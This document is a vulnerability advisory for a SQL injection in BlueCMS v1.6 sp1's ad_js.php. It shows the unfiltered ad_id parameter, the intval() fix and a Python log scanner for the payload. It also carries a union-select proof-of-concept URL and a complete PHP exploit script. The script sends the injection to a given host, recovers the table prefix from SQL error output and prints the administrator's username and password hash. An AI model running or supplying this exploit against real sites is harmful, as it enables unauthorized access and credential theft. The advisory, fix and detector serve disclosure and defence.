Official introduction: www.bluecms.net
BlueCMS is a CMS system dedicated to local classified-information portals.
Developed on today's most popular open-source combination, PHP + MySQL.
Title, Keywords and Description can be set separately for each category to help SEO.
Powerful template engine with customizable display styles.
Multi-function module plug-ins, easy to operate.
Intelligent caching technology to improve website performance.
Custom multi-attribute models with powerful column functions.
Defect file: ad_js.php
Vulnerability cause:
Line 12: $ad_id = !empty($_GET['ad_id']) ? trim($_GET['ad_id']) : '';
// The other files in the root directory filter their input properly, and intval() is used for almost every
// numeric variable, but this file was missed: trim() only strips leading and trailing whitespace.
Line 19: $ad = $db->getone("SELECT * FROM ".table('ad')." WHERE ad_id=".$ad_id);
// The value is concatenated straight into the query.
Repair solution:
$ad_id = !empty($_GET['ad_id']) ? intval($_GET['ad_id']) : '';
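As an added defensive check (not part of the advisory), the following Python script applies the same rule the fix enforces, that ad_id must be a plain integer, to web-server access-log lines and flags every request to ad_js.php that violates it. The log lines are constructed samples; one of them carries the advisory's union-select payload.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (not taken from the advisory); the second
# request carries the advisory's union-select payload for ad_js.php.
SAMPLE_LOG = """\
192.0.2.10 - - [10/Jan/2010:12:00:01 +0000] "GET /cms/ad_js.php?ad_id=1 HTTP/1.1" 200 512
192.0.2.11 - - [10/Jan/2010:12:00:02 +0000] "GET /cms/ad_js.php?ad_id=1%20and%201=2%20union%20select%201,2,3,4,5,concat(admin_name,0x7C0D0A,pwd),concat(admin_name,0x7C0D0A,pwd)%20from%20blue_admin%20where%20admin_id=1 HTTP/1.1" 200 777
192.0.2.12 - - [10/Jan/2010:12:00:03 +0000] "GET /cms/ad_js.php?ad_id=12abc HTTP/1.1" 200 300
192.0.2.13 - - [10/Jan/2010:12:00:04 +0000] "GET /cms/index.php?ad_id=abc HTTP/1.1" 200 2048
"""

# Common log format: client IP, then the quoted request line.
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Scripts whose listed parameters are row ids and therefore must be plain
# integers, exactly what the intval() fix guarantees for ad_js.php.
INT_PARAMS = {"/ad_js.php": {"ad_id"}}


def check_request(target):
    """Return (param, decoded_value) pairs whose value is not a plain integer."""
    parts = urlsplit(target)
    params = next((p for s, p in INT_PARAMS.items() if parts.path.endswith(s)), None)
    if params is None:
        return []
    query = parse_qs(parts.query, keep_blank_values=True)  # percent-decodes values
    return [
        (name, value)
        for name in params
        for value in query.get(name, [])
        if re.fullmatch(r"\d+", value) is None
    ]


def scan_log(text):
    """Return (ip, path, param, value) for every offending request in the log text."""
    hits = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        path = urlsplit(m["target"]).path
        hits.extend((m["ip"], path, name, value) for name, value in check_request(m["target"]))
    return hits


if __name__ == "__main__":
    for ip, path, name, value in scan_log(SAMPLE_LOG):
        print(f"{ip} {path} {name}={value!r}")
```

Because the rule is "integer or nothing", it catches encoded variants of the payload without needing a signature for each one, and a benign typo such as 12abc is reported too, which is the expected trade-off for an id parameter.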
Vulnerability PoC:
http://localhost/cms/ad_js.php?ad_id=1%20and%201=2%20union%20select%201,2,3,4,5,concat(admin_name,0x7C0D0A,pwd),concat(admin_name,0x7C0D0A,pwd)%20from%20blue_admin%20where%20admin_id=1
Right-click the page and view its source to read the returned data.
Vulnerability Exp:
<?php
// BlueCMS v1.6 sp1 ad_js.php SQL injection (the advisory's script, reformatted into working PHP)
print_r("
------------------------------------------
BlueCMS v1.6 sp1 \"ad_js.php\" SQL Injection
Get admin_user pwd-hash without login
By CnCxzSec http://hi.baidu.com/cncxz
------------------------------------------
");
if ($argc < 3) {
    print_r("
------------------------------------------
Usage: php ".$argv[0]." host path
host: without \"http://\"
path: path to bluecms
Example:
php ".$argv[0]." localhost /
------------------------------------------
");
    die;
}
$host = $argv[1];
$path = $argv[2];

// Send a raw GET for $path.$inj on port 80 and return the full HTTP response (false on connect failure).
function send_request($host, $path, $inj)
{
    $fp = fsockopen($host, 80, $errno, $errstr, 30);
    if (!$fp) {
        echo "$errstr ($errno)\n";
        return false;
    }
    $head  = "GET $path$inj HTTP/1.1\r\n";
    $head .= "Host: ".$host."\r\n";
    $head .= "Connection: Close\r\n\r\n";
    fputs($fp, $head);
    $result = '';
    while (!feof($fp)) {
        $result .= fgets($fp, 4096);
    }
    fclose($fp);
    return $result;
}

// concat(admin_name, 0x7C0D0A, pwd) places "|\r\n" between the two fields; ad_js.php echoes
// the row inside a JavaScript string, so the name runs from the first double quote to the "|"
// and the 32-character hash follows the escaped separator.
function show_credentials($result)
{
    $rs1  = strstr($result, '"');
    $name = substr($rs1, 1, strpos($rs1, "|") - 1);
    $pass = substr($rs1, strpos($rs1, "|") + 5, 32);
    print_r("[*] We get it!\n");
    print_r("Username: ".$name."\n");
    print_r("Pwd-hash: ".$pass."\n");
}

$inj = "/ad_js.php?ad_id=1%20and%201=2%20union%20select%201,2,3,4,5,concat(admin_name,0x7C0D0A,pwd),concat(admin_name,0x7C0D0A,pwd)%20from%20blue_admin%20where%20admin_id=1";
print_r("[*] exploiting, please wait...\n");
$result = send_request($host, $path, $inj);
if ($result === false) {
    die;
}
if (stripos($result, "document") === false) {
    // No document.write() in the reply: the default "blue_" prefix was wrong and the SQL error
    // echoed the real query, so recover the prefix from "... FROM <prefix>ad ..." and retry.
    $temp = explode("FROM", $result);
    if (isset($temp[1])) {
        $temp2 = explode("ad", $temp[1]);
    }
    if (!empty($temp2[0])) {
        $prefix = trim($temp2[0]); // strip the whitespace around the table name in the echoed query
        print_r("[*] Prefix -> ".$prefix."\n");
        $inj = "/ad_js.php?ad_id=1%20and%201=2%20union%20select%201,2,3,4,5,concat(admin_name,0x7C0D0A,pwd),concat(admin_name,0x7C0D0A,pwd)%20from%20".$prefix."admin%20where%20admin_id=1";
        $result = send_request($host, $path, $inj);
        if ($result !== false) {
            show_credentials($result);
        }
    }
} else {
    show_credentials($result);
}
?>